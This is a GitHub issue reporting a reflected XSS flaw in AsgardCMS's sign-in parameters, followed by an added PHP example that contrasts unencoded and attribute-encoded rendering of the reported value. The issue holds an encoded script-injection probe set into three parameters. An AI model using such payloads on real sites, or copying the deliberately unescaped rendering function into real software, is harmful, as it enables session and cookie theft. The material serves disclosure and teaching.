AsgardCms / Platform

A modular multilingual CMS built with Laravel 5.
https://asgardcms.com/
MIT License
782 stars 241 forks

There is one xss vulnerability #846

Open flowertimes opened 1 year ago

flowertimes commented 1 year ago

There is one XSS vulnerability

PoC

"'>

The following changes have been applied to the original request:

The value of parameter 'signin_nick' has been set to '%3E%22%27%3E%3Cscript%3Ealert%2869%29%3C%2Fscript%3E'

The value of parameter 'signin_pass' has been set to '%3E%22%27%3E%3Cscript%3Ealert%2869%29%3C%2Fscript%3E'

The value of parameter 'signin_check' has been set to '%3E%22%27%3E%3Cscript%3Ealert%2869%29%3C%2Fscript%3E'

Screenshots: 微信截图_20230609164701, 微信截图_20230609164732

flowertimes commented 1 year ago

There is an XSS vulnerability. It may steal or manipulate customer sessions and cookies, which may be used to impersonate legitimate users, allowing hackers to view or change user records and execute transactions as that user.
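
The following is an added example, not part of the issue thread and not AsgardCMS code. It assumes the three reported parameters are echoed back into a `value` attribute of the sign-in form (the issue does not say where they are reflected) and shows that rendering next to an attribute-encoded one. The function names and the sample value (built from the probe string in the report) are constructed for illustration.

```php
<?php
declare(strict_types=1);

// Constructed sample: the percent-encoded probe value from the report,
// as it would arrive in a query string or form body.
const REPORTED_VALUE = '%3E%22%27%3E%3Cscript%3Ealert%2869%29%3C%2Fscript%3E';

// Hypothetical vulnerable rendering: the submitted value is written into
// the value="" attribute with no output encoding.
function renderFieldRaw(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Hardened rendering: encode for the HTML attribute context. ENT_QUOTES
// covers both quote characters, so the value cannot close the attribute
// whichever quote style the template uses.
function renderFieldEscaped(string $name, string $value): string
{
    $enc = static fn (string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    return '<input type="text" name="' . $enc($name) . '" value="' . $enc($value) . '">';
}

// The template intends to emit exactly one tag. Any additional '<' in the
// output means user input was interpreted as markup.
function breaksOutOfAttribute(string $html): bool
{
    return substr_count($html, '<') !== 1;
}

$value = rawurldecode(REPORTED_VALUE);

foreach (['signin_nick', 'signin_pass', 'signin_check'] as $param) {
    $variants = [
        'raw'     => renderFieldRaw($param, $value),
        'escaped' => renderFieldEscaped($param, $value),
    ];
    foreach ($variants as $label => $html) {
        printf(
            "%-13s %-8s breakout=%s\n  %s\n",
            $param,
            $label,
            breaksOutOfAttribute($html) ? 'yes' : 'no',
            $html
        );
    }
}
```

In a Laravel Blade template, `{{ $value }}` applies this encoding, while `{!! $value !!}` writes the value unencoded.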